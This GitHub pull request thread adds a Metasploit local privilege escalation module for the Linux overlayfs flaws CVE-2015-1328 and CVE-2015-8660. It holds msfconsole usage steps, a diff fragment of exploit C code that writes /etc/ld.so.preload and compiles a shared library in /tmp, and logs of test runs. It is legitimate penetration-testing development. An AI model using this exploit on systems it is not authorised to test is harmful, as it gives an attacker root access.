### PR TITLE
Linux Priv Esc via overlayfs

### PR DESCRIPTION
**Pull request by h00die**
Exploits 2 bugs (depending on kernel) via CVE-2015-1328, and CVE-2015-8660 for overlayfs
## Verification

List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] get a shell
- [ ] Do: `use exploit/linux/local/overlayfs_priv_esc`
- [ ] Do: `set session #`
- [ ] Do: `set verbose true`
- [ ] Do: `check`
  ensure you have a vuln kernel, and set the target correctly
- [ ] Do: `exploit`
- [ ] **Verify** you get a root shell back

### CODE REVIEW

**Comment by h00die** [comment]
Wanted to throw in a comment, I'm working with @egypt to get this and #7379 to use metasm.  However, if that doesn't work out, or takes forever, this is a working exploit.

I also wanted to note that 2015-1328 uses `/bin/su` to escalate.  I attempted MANY combinations of `/bin/su -c <payload>` but just couldn't seem to get the right combo to work.  With that, I noticed when trying to drop mettle, the `session.shell_command("/bin/su")` didn't seem to execute, therefore a standard `shell` is the best payload to go with for consistent behavior.

**Comment by wwebb-r7** [comment]
The consensus among the intelligentsia is scrapping the compilation option and just leaving the binary dropper, while throwing the source in external/source/exploits.  I, and most others I believe, usually gloss over anything requiring such because it's so problematic and noisy.

I haven't reviewed the vulnerability or exploit in depth yet but it looks good to go aside from that.

**Comment by h00die** [comment]
I like the idea of pulling the large string block out and dropping it to its own file, makes the code easier to read (both sets).
However, with doing that, why not just leave the compile option in?  It's set to auto, so it'll only compile if the env is right anyways.  Or the default could be changed to false, regardless, the code is already written and there, and its only an additional say 10 lines, I'd vote to just leave it in there personally.  I don't see the point necessarily of having the source sit in external/source/exploits if nothing references it, it become kind of an abandoned file.

Up to you all though, just my $.02

**Comment by wwebb-r7** [comment]
I won't try to speak for others, but in my experience, if people are interested in compiling a local exploit, they're going to do it outside of Metasploit.  The added complexity and potential support issues down the line that come from shoehorning C source into Ruby aren't worth it in that respect unless there's some reason it has to happen that way (which there may be.  Again, I haven't reviewed the vulnerability much.  Let me know if I'm missing something)

As far as the source files, they are referenced by some things, such as 1) people who don't feel great about running mysterious binary blobs 2) us 5 years from now when someone reports an issue with the module and Robby Ray's Radical Exploit Emporium is no longer online, and 3) the people from 1 when the situation from 3 happens to them.

File: modules/exploits/linux/local/overlayfs_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,458 @@
...
+              fprintf(stderr,"exploit failed\n");
+              exit(-1);
+          }
+
+          fprintf(stderr,"/etc/ld.so.preload created\n");
+          fprintf(stderr,"creating shared library\n");
+          lib = open("/tmp/ofs-lib.c",O_CREAT|O_WRONLY,0777);
+          write(lib,LIB,strlen(LIB));
+          close(lib);
+          lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
```
Comment (wvu-r7) [inline modules/exploits/linux/local/overlayfs_priv_esc.rb]: I'm fine with an option to compile (preferably a fallback), but the PoC indiscriminately shells out to GCC, and that is a problem.

**Comment by h00die** [comment]
I got this re-coded today, I think its looking and working much cleaner, just want to do one final round of testing on all branches of the code w/ reverting my VM etc.  Should have this fixed and uploaded this weekend!

**Comment by h00die** [comment]
ok, a big rewrite of this module.  We now load the c code from external/sources (if that isn't there, per hdm comment in irc, we fail to pre-compiled).  I removed out that funky gcc command in the one CVE's code and we now write/compile that along with everything else.  Should be much cleaner and better(er)!

**Comment by wwebb-r7** [comment]
`` msf exploit(overlayfs_priv_esc) > exploit

[*] Started reverse TCP handler on 192.168.79.132:4444 
[*] Checking if mount points exist
[+] /tmp/haxhax not created
[+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
[-] gcc is not installed.  Compiling will fail.
[*] Dropping pre-compiled exploit on system
[*] Checking if mount points exist
[+] /tmp/haxhax not created
[+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
[*] Writing to /tmp/LhAHmSoO (13564 bytes)
[*] Max line length is 65537
[*] Writing 13564 bytes in 1 chunks of 33789 bytes (octal-encoded), using printf
[*] Writing to /tmp/1H0qLaq2 (155 bytes)
[*] Max line length is 65537
[*] Writing 155 bytes in 1 chunks of 457 bytes (octal-encoded), using printf
[*] Exploiting...
[*] mount failed..
[*] couldn't create suid :(
[!] This exploit may require manual cleanup of '/tmp/LhAHmSoO' on the target
[!] This exploit may require manual cleanup of '/tmp/1H0qLaq2' on the target
[*] Exploit completed, but no session was created.
``
This is on stock Ubuntu 14.04 kernel 3.13.0-24.  Looks like it is running 2015-8660 against it.

**Comment by wwebb-r7** [comment]
```
msf exploit(overlayfs_priv_esc) > exploit
[*] Started reverse TCP handler on 192.168.79.132:4444 
[*] Checking if mount points exist
[+] /tmp/haxhax not created
[+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
[-] gcc is not installed.  Compiling will fail.
[*] Dropping pre-compiled exploit on system
[*] Checking if mount points exist
[+] /tmp/haxhax not created
[+] Kernel 3.13.0.pre.24.pre.generic is vulnerable to CVE-2015-1328
[*] Writing to /tmp/LhAHmSoO (13564 bytes)
[*] Max line length is 65537
[*] Writing 13564 bytes in 1 chunks of 33789 bytes (octal-encoded), using printf
[*] Writing to /tmp/1H0qLaq2 (155 bytes)
[*] Max line length is 65537
[*] Writing 155 bytes in 1 chunks of 457 bytes (octal-encoded), using printf
[*] Exploiting...
[*] mount failed..
[*] couldn't create suid :(
[!] This exploit may require manual cleanup of '/tmp/LhAHmSoO' on the target
[!] This exploit may require manual cleanup of '/tmp/1H0qLaq2' on the target
[*] Exploit completed, but no session was created.
```
This is on stock Ubuntu 14.04 kernel version 3.13.0-24.  It looks as if its running 2015-8660 against it.

**Comment by h00die** [comment]
Target isn't auto. Show options? Will check more later

**Comment by wwebb-r7** [comment]
You're right, I missed that.  It's confusing to have exploits for two vulnerabilities in one module even if they attack the same vector.  I'm now tempted to say this would be best divided into two modules.  Let me get more input from other people on some potential issues I have in mind with regards to leaving it as one before you set everything on fire though.

**Comment by h00die** [comment]
Originally I didn't do an `auto` target because I wanted the user to make a conscious decision on which vuln they were exploiting since exploitation at the local/kernel level can be more dangerous.
However, there are a few options here:
1. Create an `auto` target that uses the right exploit automatically, and make this the default
2. Create a failure if the target != check kernel (like in your case) to prevent running the wrong one
3. Make this 2 exploits instead of 1

I put both in one considering they came out about 6mo from eachother, and it took 9 months past the last one to get it coded into msf.  Seemed like the best idea, but I'm not one to argue so whatever you guys think is best, it'll be easy to do at this point!

**Comment by h00die** [comment]
@wwebb-r7 any updates on how r7 peeps want to handle this?

**Comment by wwebb-r7** [comment]
@h00die I meant to go ahead and land this last week but my vacation has a been a mess.  As far as everyone I discussed it with, all I can really say is I think we should discuss it more at some point because opinions are varied at the moment.

**Comment by wwebb-r7** [comment]
### Release Notes

This adds exploits for CVE-2015-1328 and CVE-2015-8660, which are local privilege escalations vulnerabilities on Linux via the same vector of overlayfs

**Comment by h00die** [comment]
When there's a consensus on how to approach (several of) the issues I've brought up with the local linux sploits, i'll adjust accordingly!

**Pull request merged**